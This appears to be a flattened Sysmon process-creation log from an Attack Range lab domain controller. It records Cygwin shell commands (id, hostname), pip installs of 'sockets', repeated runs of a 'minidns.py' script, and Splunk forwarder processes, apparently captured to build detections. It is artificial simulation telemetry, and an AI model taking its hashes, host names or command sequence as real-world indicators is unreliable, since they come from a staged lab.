socket.pyC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B84C0D8A63437424F8A09F762743B20,SHA256=E394091F86CB552B70CB59583A3D5C3175EC501367613846DBCA5F3FEA03358C,IMPHASH=EDA8A5B05CE5C31D8A53AE4F8374ED88{A8622C2F-5735-6078-900D-00000000AE01}2272C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Python27\Scripts" 154100x800000000000000064901Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:41.555{A8622C2F-5771-6078-A70D-00000000AE01}4860C:\cygwin64\bin\cut.exe-----cut -d ' ' -f1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-5771-6078-A50D-00000000AE01}2044C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000064894Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:41.553{A8622C2F-5771-6078-A60D-00000000AE01}1156C:\cygwin64\bin\hostname.exe-----hostname -I C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-5771-6078-A50D-00000000AE01}2044C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000064886Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:41.547{A8622C2F-5771-6078-A50D-00000000AE01}2044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5771-6078-A40D-00000000AE01}6160C:\Python27\python.exeC:\Python27\python.exe minidns.py 154100x800000000000000064878Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:41.503{A8622C2F-5771-6078-A40D-00000000AE01}6160C:\Python27\python.exe-----C:\Python27\python.exe minidns.pyC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5771-6078-A30D-00000000AE01}6336C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064859Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:41.492{A8622C2F-5771-6078-A30D-00000000AE01}6336C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064810Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:28.335{A8622C2F-5764-6078-A20D-00000000AE01}6672C:\Python27\python.exe-----C:\Python27\python.exe minidns.pyC:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5764-6078-A10D-00000000AE01}6460C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064791Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:28.320{A8622C2F-5764-6078-A10D-00000000AE01}6460C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064763Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:22.510{A8622C2F-575E-6078-A00D-00000000AE01}2044C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064737Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:20.538{A8622C2F-575C-6078-9F0D-00000000AE01}5392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064724Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:19.865{A8622C2F-575B-6078-9E0D-00000000AE01}3736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064677Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:19.287{A8622C2F-575B-6078-9D0D-00000000AE01}5368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064669Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:19.031{A8622C2F-575B-6078-9C0D-00000000AE01}1348C:\Python27\python.exe-----c:\python27\python.exe -u -c "import sys, setuptools, tokenize; sys.argv[0] = 'c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-lo1d1l\\sockets\\setup.py'; __file__='c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-lo1d1l\\sockets\\setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record c:\users\admini~1\appdata\local\temp\2\pip-record-ekox1z\install-record.txt --single-version-externally-managed --compilec:\users\admini~1\appdata\local\temp\2\pip-install-lo1d1l\sockets\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5759-6078-9A0D-00000000AE01}3868C:\Python27\python.exe"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install sockets 154100x800000000000000064654Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:18.725{A8622C2F-575A-6078-9B0D-00000000AE01}5928C:\Python27\python.exe-----c:\python27\python.exe -c "import sys, setuptools, tokenize; sys.argv[0] = 'c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-lo1d1l\\sockets\\setup.py'; __file__='c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-lo1d1l\\sockets\\setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" egg_info --egg-base pip-egg-infoc:\users\admini~1\appdata\local\temp\2\pip-install-lo1d1l\sockets\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5759-6078-9A0D-00000000AE01}3868C:\Python27\python.exe"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install sockets 154100x800000000000000064639Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:17.780{A8622C2F-5759-6078-9A0D-00000000AE01}3868C:\Python27\python.exe-----"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install socketsC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5759-6078-990D-00000000AE01}4384C:\Python27\Scripts\pip2.exepip2 install sockets 154100x800000000000000064631Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:17.771{A8622C2F-5759-6078-990D-00000000AE01}4384C:\Python27\Scripts\pip2.exe-----pip2 install socketsC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B84C0D8A63437424F8A09F762743B20,SHA256=E394091F86CB552B70CB59583A3D5C3175EC501367613846DBCA5F3FEA03358C,IMPHASH=EDA8A5B05CE5C31D8A53AE4F8374ED88{A8622C2F-5735-6078-900D-00000000AE01}2272C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Python27\Scripts" 154100x800000000000000064623Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:17.629{A8622C2F-5759-6078-980D-00000000AE01}3008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064612Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:16.962{A8622C2F-5758-6078-970D-00000000AE01}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064601Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:16.296{A8622C2F-5758-6078-960D-00000000AE01}4940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064478Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:49.958{A8622C2F-573D-6078-950D-00000000AE01}1100C:\Python27\python.exe-----"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install socketC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-573D-6078-940D-00000000AE01}6736C:\Python27\Scripts\pip2.exepip2 install socket 154100x800000000000000064470Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:49.950{A8622C2F-573D-6078-940D-00000000AE01}6736C:\Python27\Scripts\pip2.exe-----pip2 install socketC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B84C0D8A63437424F8A09F762743B20,SHA256=E394091F86CB552B70CB59583A3D5C3175EC501367613846DBCA5F3FEA03358C,IMPHASH=EDA8A5B05CE5C31D8A53AE4F8374ED88{A8622C2F-5735-6078-900D-00000000AE01}2272C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Python27\Scripts" 154100x800000000000000064452Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:47.240{A8622C2F-573B-6078-930D-00000000AE01}4604C:\Python27\python.exe-----"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install sockeyC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-573B-6078-920D-00000000AE01}6552C:\Python27\Scripts\pip2.exepip2 install sockey 154100x800000000000000064444Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:47.227{A8622C2F-573B-6078-920D-00000000AE01}6552C:\Python27\Scripts\pip2.exe-----pip2 install sockeyC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B84C0D8A63437424F8A09F762743B20,SHA256=E394091F86CB552B70CB59583A3D5C3175EC501367613846DBCA5F3FEA03358C,IMPHASH=EDA8A5B05CE5C31D8A53AE4F8374ED88{A8622C2F-5735-6078-900D-00000000AE01}2272C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Python27\Scripts" 154100x800000000000000064410Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:41.835{A8622C2F-5735-6078-900D-00000000AE01}2272C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /s /k pushd "C:\Python27\Scripts"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000064334Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:25.905{A8622C2F-5725-6078-8F0D-00000000AE01}3148C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064305Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:22.508{A8622C2F-5722-6078-8E0D-00000000AE01}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064291Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:20.555{A8622C2F-5720-6078-8D0D-00000000AE01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064277Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:20.060{A8622C2F-5720-6078-8C0D-00000000AE01}6440C:\cygwin64\bin\tzset.exe-----"C:\cygwin64\bin\tzset.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9A334E31142D616401445D77D38B145A,SHA256=3D76C166E2D05B23A6E164B1F9C251C771AEF4E423B00C2EBE4080682C93C243,IMPHASH=36078269731E740E482547ADAAC73406{A8622C2F-5720-6078-8B0D-00000000AE01}648C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064267Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:20.051{A8622C2F-5720-6078-8B0D-00000000AE01}648C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5720-6078-8A0D-00000000AE01}6336C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064257Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:20.043{A8622C2F-5720-6078-8A0D-00000000AE01}6336C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064244Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:20.026{A8622C2F-5720-6078-890D-00000000AE01}5928C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-5720-6078-880D-00000000AE01}3916C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064234Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:20.017{A8622C2F-5720-6078-880D-00000000AE01}3916C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5720-6078-870D-00000000AE01}3008C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064223Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:20.008{A8622C2F-5720-6078-870D-00000000AE01}3008C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064210Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.994{A8622C2F-571F-6078-860D-00000000AE01}6444C:\cygwin64\bin\id.exe-----"C:\cygwin64\bin\id.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=5800D64A2799F3182F90A7DBC34B5B1D,SHA256=0B939F24A18CBAF7C8FBBF8A8AE4F474CBDF61BD54870D687A584DA4B29E1FD3,IMPHASH=7D3F9B4155D2A624AD839B9C7F2F075A{A8622C2F-571F-6078-850D-00000000AE01}7016C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064200Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.986{A8622C2F-571F-6078-850D-00000000AE01}7016C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-840D-00000000AE01}5332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064190Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.977{A8622C2F-571F-6078-840D-00000000AE01}5332C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064169Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.957{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-820D-00000000AE01}4412C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000064153Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.941{A8622C2F-571F-6078-820D-00000000AE01}4412C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-571F-6078-7E0D-00000000AE01}5744C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000064139Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.911{A8622C2F-571F-6078-800D-00000000AE01}5320C:\cygwin64\bin\cygwin-console-helper.exe-----"\\?\C:\cygwin64\bin\cygwin-console-helper.exe" 0x418 